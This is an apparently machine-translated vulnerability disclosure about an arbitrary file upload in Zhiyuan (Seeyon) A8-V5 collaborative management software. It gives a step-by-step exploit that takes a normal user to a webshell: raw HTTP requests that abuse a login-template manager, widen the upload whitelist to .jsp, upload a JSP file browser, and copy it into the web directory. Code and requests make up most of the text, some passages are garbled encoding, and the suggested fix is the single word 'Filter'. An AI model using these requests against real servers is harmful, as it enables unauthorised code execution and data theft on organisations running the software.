Zhiyuan A8-V5 collaborative management software normal user Arbitrary File Upload (kill V5)
These days have been pondering far A8-V5, yesterday found a few small problems, today further mining Arbitrary File Upload Vulnerability.
Zhiyuan A8-V5 collaborative management software allows ordinary users to call the function of the system-Permission [Login Page Template management], although the browser can not directly access this function, prompt that the permission is insufficient, however, data packets can be sent directly.
Zhiyuan A8-V5 collaborative management software fully considers the danger of file upload, the whole system uses the Upload File Cache to the web directory, cannot directly obtain webshell. However, the webshell can be obtained by migrating the File Cache in [Login Page Template management] to the web directory.
Steps:
1. Obtain the template ID using valid sessions
2. Break through the restrictions to upload jsp executable files
3. Use Dynamic Migration Technology to migrate files cached outside the web directory to any web directory
1. Obtain the template ID using valid sessions
Request:
POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateListAccept-Language: zh-cnProxy-Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: a8v51.seeyon.comContent-Length: 74DNT: 1Pragma: no-cacheCookie: JSESSIONID=4DD87116B4082E92D03F5BB3F7F0C56F; loginPageURL="/main.do"; avatarImageUrl=8469117046183055270; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849; Hm_lpvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849managerMethod=selectTemplateById&arguments=["2676694155142778633"]
Response:
{"Name": "Logon page-Single Image", "path": "default \/login. jsp "," description ":" Single Image, simple style "," updateTime ":" "," sort ":" 1 "," preset ": 1, "updateUser": "8469117046183055270", "cdefault": 0, "thumbnail": "default \/thumbnail.png", "id": "2676694155142778633", "new": false, "extraMap ":{}}
The value of the parameter id in response needs to be recorded as 2676694155142778633
2. Break through the restrictions to upload jsp executable files
You need to modify the extensions in the original post request and add jsp after "jpg, jpeg, gif, bmp, png". Change the filename file name from. jsg to. jsp.
After modification, the request is as follows:
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.0Accept: text/html, application/xhtml+xml, */*Referer: http://a8v51.seeyon.com/seeyon/fileUpload.do?type=&firstSave=true&applicationCategory=1&extensions=jpg,jpeg,gif,bmp,png&quantity=1&isEncrypt=false&attachmentTrId=poi3&callMethod=uploadCallBack2&maxSize=2097152&takeOver=true&_isModalDialog=trueAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoContent-Type: multipart/form-data; boundary=---------------------------7ded626340460Proxy-Connection: Keep-AlivePragma: no-cacheContent-Length: 76766DNT: 1Host: a8v51.seeyon.comCookie: JSESSIONID=3385E1567ED6D100FD461F2299761286; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752-----------------------------7ded626340460Content-Disposition: form-data; name="type"-----------------------------7ded626340460Content-Disposition: form-data; name="extensions"jpg,jpeg,gif,bmp,png,jsp-----------------------------7ded626340460Content-Disposition: form-data; name="applicationCategory"1-----------------------------7ded626340460Content-Disposition: form-data; name="destDirectory"-----------------------------7ded626340460Content-Disposition: form-data; name="destFilename"-----------------------------7ded626340460Content-Disposition: form-data; name="maxSize"2097152-----------------------------7ded626340460Content-Disposition: form-data; name="isEncrypt"false-----------------------------7ded626340460Content-Disposition: form-data; name="callMethod"uploadCallBack2-----------------------------7ded626340460Content-Disposition: form-data; name="attachmentTrId"poi3-----------------------------7ded626340460Content-Disposition: form-data; name="firstSave"true-----------------------------7ded626340460Content-Disposition: form-data; name="takeOver"true-----------------------------7ded626340460Content-Disposition: form-data; name="file1"; filename="wooyun.jsp"Content-Type: text/plain<%--jsp File browser 1.2--%>-----------------------------7ded626340460--
Find ". jsp" in response"
Record
fileurls=fileurls+","+'-4028755744185366901';
Value "-4028755744185366901" in
3. Use Dynamic Migration Technology to migrate files cached outside the web directory to any web directory
First, let's see how the source code is written.
If ("1". equals (hotSpotType) {String picFileId = (String) params. get ("picFileId" + I); if (picFileId! = Null) & (picFileId. trim (). length ()> 0) {File uploadedFile = this. fileManager. getFile (Long. valueOf (Long. parseLong (picFileId), new Date (); try {String targetUrl = hotspotvalue. substring (0, hotspotvalue. lastIndexOf ("/") + 1) + picFileId + hotspotvalue. substring (hotspotvalue. lastIndexOf (". "), hotspotvalue. length (); FileCopyUtils. copy (uploadedFile, new File (Template_Parent_Path + targetUrl); this. fileSynchronization. copy (new FileInputStream (uploadedFile), "main/login/" + targetUrl); hotspot. setHotspotvalue (targetUrl);} catch (IOException e) {throw new BusinessException ("image file storage error:" + e );}}}
Two parameters are required for success: picFileId and targetUrl.
Okay. In this demonstration
The picFileId value is-4028755744185366901 in step 2.
TargetUrl =
String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());
PicFileId is known
Hotspotvalue can be customized
The custom location is the last line. If the id obtained in step 1 is different, replace the following id with the id in step 1.
The request is as follows:
POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321 HTTP/1.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateListAccept-Language: zh-cnProxy-Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: a8v51.seeyon.comContent-Length: 5255DNT: 1Pragma: no-cacheCookie: JSESSIONID=31BEBA9DAA457E8E8280E97175FD4DBB; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752managerMethod=transSaveTemplate&arguments=[{"id":"2676694155142778633","entityLevel":"system","entityId":"-1730833917365171641","name":"??????é?μ-????????????","description":"?????????????????????é£?? ?","sort":"1","path":"default/login.jsp","hotSpotsCount":"8","hotSpotId0":"1186536015593226561","hotSpotType0":"0","templateId0":"2676694155142778633","hotspotkey0":"note","description0":"","entityId0":"-1730833917365171641","entityLevel0":"System","hotspotName0":"hotspot.name.note","hotspotModule0":"0","hotspotSort0":"0","hotspotRead0":"0","showdisplay0":"0","hotAccountId0":"-1730833917365171641","hotspotvalue0":"è?′è??A8-V5????????????è?ˉ???","hotSpotId1":"-2858574230077355948","hotSpotType1":"0","templateId1":"2676694155142778633","hotspotkey1":"note","description1":"","entityId1":"-1730833917365171641","entityLevel1":"System","hotspotName1":"hotspot.name.note","hotspotModule1":"0","hotspotSort1":"0","hotspotRead1":"0","showdisplay1":"0","hotAccountId1":"-1730833917365171641","hotspotvalue1":"è?′è??A8-V5????????????è?ˉ???","hotSpotId2":"-6590619288520733107","hotSpotType2":"1","templateId2":"2676694155142778633","hotspotkey2":"contentbgi","description2":"","entityId2":"-1730833917365171641","entityLevel2":"System,Account","hotspotName2":"hotspot.name.loginpic","hotspotModule2":"0","hotspotSort2":"1","hotspotRead2":"0","showdisplay2":"0","hotAccountId2":"-1730833917365171641","picFileId2":"","hotspotvalue2":"default/images/main_content_ie6.jpg","hotSpotId3":"-151221304857771845","hotSpotType3":"1","templateId3":"2676694155142778633","hotspotkey3":"contentbgi","description3":"","entityId3":"-1730833917365171641","entityLevel3":"System,Account","hotspotName3":"hotspot.name.loginpic","hotspotModule3":"0","hotspotSort3":"1","hotspotRead3":"0","showdisplay3":"0","hotAccountId3":"-1730833917365171641","picFileId3":"","hotspotvalue3":"default/images/main_content_ie6.jpg","hotSpotId4":"-8315917587715897900","hotSpotType4":"2","templateId4":"2676694155142778633","hotspotkey4":"mainbgc","description4":"","entityId4":"-1730833917365171641","entityLevel4":"System,Account","hotspotName4":"hotspot.name.mainbgc","hotspotModule4":"0","hotspotSort4":"2","hotspotRead4":"0","showdisplay4":"0","hotAccountId4":"-1730833917365171641","hotspotvalue4":"#fafafa","hotSpotId5":"7763739069174663407","hotSpotType5":"2","templateId5":"2676694155142778633","hotspotkey5":"mainbgc","description5":"","entityId5":"-1730833917365171641","entityLevel5":"System,Account","hotspotName5":"hotspot.name.mainbgc","hotspotModule5":"0","hotspotSort5":"2","hotspotRead5":"0","showdisplay5":"0","hotAccountId5":"-1730833917365171641","hotspotvalue5":"#fafafa","hotSpotId6":"5768369956880141892","hotSpotType6":"1","templateId6":"2676694155142778633","hotspotkey6":"mainbgi","description6":"","entityId6":"-1730833917365171641","entityLevel6":"System","hotspotName6":"hotspot.name.mainbgi","hotspotModule6":"0","hotspotSort6":"3","hotspotRead6":"0","showdisplay6":"0","hotAccountId6":"-1730833917365171641","picFileId6":"","hotspotvalue6":"default/images/main_bg.png","hotspotTiling6":"1","hotSpotId7":"-3488186128041623434","hotSpotType7":"1","templateId7":"2676694155142778633","hotspotkey7":"mainbgi","description7":"","entityId7":"-1730833917365171641","entityLevel7":"System","hotspotName7":"hotspot.name.mainbgi","hotspotModule7":"0","hotspotSort7":"3","hotspotRead7":"0","showdisplay7":"0","hotAccountId7":"-1730833917365171641","picFileId7":"-4028755744185366901","hotspotvalue7":"default/-4028755744185366901.jsp","hotspotTiling7":"1"}]
Response: The response is null. Here, the cached files stored in non-web directories are migrated to the web directory.
Solution:
Filter